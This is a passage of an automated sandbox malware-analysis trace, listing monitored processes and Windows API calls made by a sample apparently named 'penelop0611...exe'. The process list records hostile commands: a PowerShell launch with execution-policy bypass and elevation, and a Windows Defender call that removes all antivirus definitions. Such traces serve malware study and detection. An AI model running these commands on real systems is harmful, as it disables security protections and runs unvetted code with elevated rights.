returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.560] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x230f4000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0xa74" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 79 os_tid = 0x7a0 Thread: id = 80 os_tid = 0x7c4 Thread: id = 81 os_tid = 0x7f8 Thread: id = 82 os_tid = 0x430 Thread: id = 83 os_tid = 0x268 Thread: id = 84 os_tid = 0x768 Thread: id = 85 os_tid = 0x764 Thread: id = 86 os_tid = 0x760 Thread: id = 87 os_tid = 0x75c Thread: id = 88 os_tid = 0x70c Thread: id = 89 os_tid = 0x6e8 Thread: id = 90 os_tid = 0x6d8 Thread: id = 91 os_tid = 0x6d4 Thread: id = 92 os_tid = 0x6c8 Thread: id = 93 os_tid = 0x6c0 Thread: id = 94 os_tid = 0x6b8 Thread: id = 95 os_tid = 0x6a4 Thread: id = 96 os_tid = 0x6a0 Thread: id = 97 os_tid = 0x690 Thread: id = 98 os_tid = 0x67c Thread: id = 99 os_tid = 0x490 Thread: id = 100 os_tid = 0x454 Thread: id = 101 os_tid = 0x450 Thread: id = 102 os_tid = 0x428 Thread: id = 103 os_tid = 0x424 Thread: id = 104 os_tid = 0x420 Thread: id = 105 os_tid = 0x404 Thread: id = 106 os_tid = 0x18c Thread: id = 107 os_tid = 0xf0 Thread: id = 108 os_tid = 0xc8 Thread: id = 109 os_tid = 0x3f0 Thread: id = 110 os_tid = 0x3e4 Thread: id = 111 os_tid = 0x398 Thread: id = 112 os_tid = 0x394 Thread: id = 113 os_tid = 0x390 Thread: id = 114 os_tid = 0x38c Thread: id = 115 os_tid = 0x378 Thread: id = 116 os_tid = 0x370 Thread: id = 118 os_tid = 0xaa0 Thread: id = 119 os_tid = 0xaa4 Thread: id = 120 os_tid = 0xaa8 Thread: id = 121 os_tid = 0xaac Thread: id = 122 os_tid = 0xab0 Thread: id = 123 os_tid = 0xab4 Thread: id = 124 os_tid = 0xab8 Thread: id = 125 os_tid = 0xac0 Thread: id = 126 os_tid = 0xac4 Thread: id = 127 os_tid = 0xac8 Thread: id = 128 os_tid = 0xad0 Thread: id = 129 os_tid = 0xad4 Thread: id = 181 os_tid = 0xbb0 Thread: id = 182 os_tid = 0xbe0 Thread: id = 183 os_tid = 0xbe4 Thread: id = 184 os_tid = 0xbf0 Thread: id = 185 os_tid = 0xbf8 Process: id = "15" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x45df9000" os_pid = "0xae8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xa14" cmd_line = "powershell -NoProfile -ExecutionPolicy Bypass -Command \"& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1\"\"' -Verb RunAs}\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 132 os_tid = 0xaec Process: id = "16" image_name = "mpcmdrun.exe" filename = "c:\\program files\\windows defender\\mpcmdrun.exe" page_root = "0x44007000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xa14" cmd_line = "\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -removedefinitions -all" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 133 os_tid = 0xb44 Thread: id = 134 os_tid = 0xb74 Process: id = "17" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x910c000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x3f8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c4" [0xc000000f], "LOCAL" [0x7] Thread: id = 136 os_tid = 0x9bc Thread: id = 137 os_tid = 0x868 Thread: id = 138 os_tid = 0x820 Thread: id = 139 os_tid = 0x7e0 Thread: id = 140 os_tid = 0x754 Thread: id = 141 os_tid = 0x704 Thread: id = 142 os_tid = 0x6e0 Thread: id = 143 os_tid = 0x6b0 Thread: id = 144 os_tid = 0x698 Thread: id = 145 os_tid = 0x678 Thread: id = 146 os_tid = 0x630 Thread: id = 147 os_tid = 0x610 Thread: id = 148 os_tid = 0x14c Thread: id = 149 os_tid = 0x140 Thread: id = 150 os_tid = 0x158 Thread: id = 151 os_tid = 0x294 Thread: id = 152 os_tid = 0x218 Thread: id = 153 os_tid = 0x230 Thread: id = 154 os_tid = 0x21c Thread: id = 155 os_tid = 0x1c4 Thread: id = 188 os_tid = 0x410 Thread: id = 189 os_tid = 0x534 Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8bed000" os_pid = "0x334" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "14" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ba6f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 156 os_tid = 0x5b4 Thread: id = 157 os_tid = 0x3a0 Thread: id = 158 os_tid = 0x658 Thread: id = 159 os_tid = 0x584 Thread: id = 160 os_tid = 0x750 Thread: id = 161 os_tid = 0x730 Thread: id = 162 os_tid = 0x728 Thread: id = 163 os_tid = 0x674 Thread: id = 164 os_tid = 0x65c Thread: id = 165 os_tid = 0x144 Thread: id = 166 os_tid = 0x118 Thread: id = 167 os_tid = 0x3ec Thread: id = 168 os_tid = 0x3e8 Thread: id = 169 os_tid = 0x3e0 Thread: id = 170 os_tid = 0x3dc Thread: id = 171 os_tid = 0x3cc Thread: id = 172 os_tid = 0x3c8 Thread: id = 173 os_tid = 0x388 Thread: id = 174 os_tid = 0x384 Thread: id = 175 os_tid = 0x380 Thread: id = 176 os_tid = 0x37c Thread: id = 177 os_tid = 0x364 Thread: id = 178 os_tid = 0x360 Thread: id = 179 os_tid = 0x34c Thread: id = 180 os_tid = 0x338 Thread: id = 186 os_tid = 0x80c Process: id = "19" image_name = "penelop0611_2019-11-06_10-30.exe_.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" page_root = "0x7b299000" os_pid = "0x4d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e0dc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 190 os_tid = 0x4d8 [0120.087] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x4ba8df00, dwHighDateTime=0x1d5956a)) [0120.087] GetCurrentThreadId () returned 0x4d8 [0120.087] GetCurrentProcessId () returned 0x4d4 [0120.087] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=6092232089) returned 1 [0121.795] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x77d7fd35, hStdError=0x77de7daf)) [0121.795] GetProcessHeap () returned 0x6e0000 [0121.796] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75d20000 [0121.796] GetProcAddress (hModule=0x75d20000, lpProcName="FlsAlloc") returned 0x75d34f2b [0121.796] GetProcAddress (hModule=0x75d20000, lpProcName="FlsFree") returned 0x75d3359f [0121.796] GetProcAddress (hModule=0x75d20000, lpProcName="FlsGetValue") returned 0x75d31252 [0121.796] GetProcAddress (hModule=0x75d20000, lpProcName="FlsSetValue") returned 0x75d34208 [0121.796] GetProcAddress (hModule=0x75d20000, lpProcName="InitializeCriticalSectionEx") returned 0x75d34d28 [0121.796] GetProcAddress (hModule=0x75d20000, lpProcName="CreateEventExW") returned 0x75db410b [0121.796] GetProcAddress (hModule=0x75d20000, lpProcName="CreateSemaphoreExW") returned 0x75db4195 [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="SetThreadStackGuarantee") returned 0x75d3d31f [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="CreateThreadpoolTimer") returned 0x75d4ee7e [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="SetThreadpoolTimer") returned 0x77da441c [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77dcc50e [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="CloseThreadpoolTimer") returned 0x77dcc381 [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="CreateThreadpoolWait") returned 0x75d4f088 [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="SetThreadpoolWait") returned 0x77db05d7 [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="CloseThreadpoolWait") returned 0x77dcca24 [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="FlushProcessWriteBuffers") returned 0x77d80b8c [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77e3fde8 [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="GetCurrentProcessorNumber") returned 0x77dd1e1d [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="GetLogicalProcessorInformation") returned 0x75db4761 [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="CreateSymbolicLinkW") returned 0x75dacd11 [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0121.797] GetProcAddress (hModule=0x75d20000, lpProcName="EnumSystemLocalesEx") returned 0x75db424f [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="CompareStringEx") returned 0x75db46b1 [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="GetDateFormatEx") returned 0x75dc6676 [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="GetLocaleInfoEx") returned 0x75db4751 [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="GetTimeFormatEx") returned 0x75dc65f1 [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="GetUserDefaultLocaleName") returned 0x75db47c1 [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="IsValidLocaleName") returned 0x75db47e1 [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="LCMapStringEx") returned 0x75db47f1 [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="GetCurrentPackageId") returned 0x0 [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="GetTickCount64") returned 0x75d4eee0 [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0121.798] GetProcAddress (hModule=0x75d20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0121.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3bc) returned 0x6f1f90 [0121.799] GetCurrentThreadId () returned 0x4d8 [0121.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6eec30 [0121.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x800) returned 0x6f2358 [0121.799] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405695, hStdOutput=0x215d5f42, hStdError=0x0)) [0121.799] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0121.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0121.799] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0121.799] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart" [0121.799] GetEnvironmentStringsW () returned 0x6f2b60* [0121.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0121.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x581) returned 0x6f3670 [0121.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x6f3670, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1409 [0121.799] FreeEnvironmentStringsW (penv=0x6f2b60) returned 1 [0121.799] GetLastError () returned 0x7f [0121.799] SetLastError (dwErrCode=0x7f) [0121.799] GetLastError () returned 0x7f [0121.799] SetLastError (dwErrCode=0x7f) [0121.800] GetLastError () returned 0x7f [0121.800] SetLastError (dwErrCode=0x7f) [0121.800] GetACP () returned 0x4e4 [0121.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x220) returned 0x6f3c00 [0121.800] GetLastError () returned 0x7f [0121.800] SetLastError (dwErrCode=0x7f) [0121.800] IsValidCodePage (CodePage=0x4e4) returned 1 [0121.800] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fedc | out: lpCPInfo=0x18fedc) returned 1 [0121.800] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9a4 | out: lpCPInfo=0x18f9a4) returned 1 [0121.800] GetLastError () returned 0x7f [0121.800] SetLastError (dwErrCode=0x7f) [0121.800] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.800] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f728, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0121.800] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9b8 | out: lpCharType=0x18f9b8) returned 1 [0121.800] GetLastError () returned 0x7f [0121.800] SetLastError (dwErrCode=0x7f) [0121.800] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.800] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 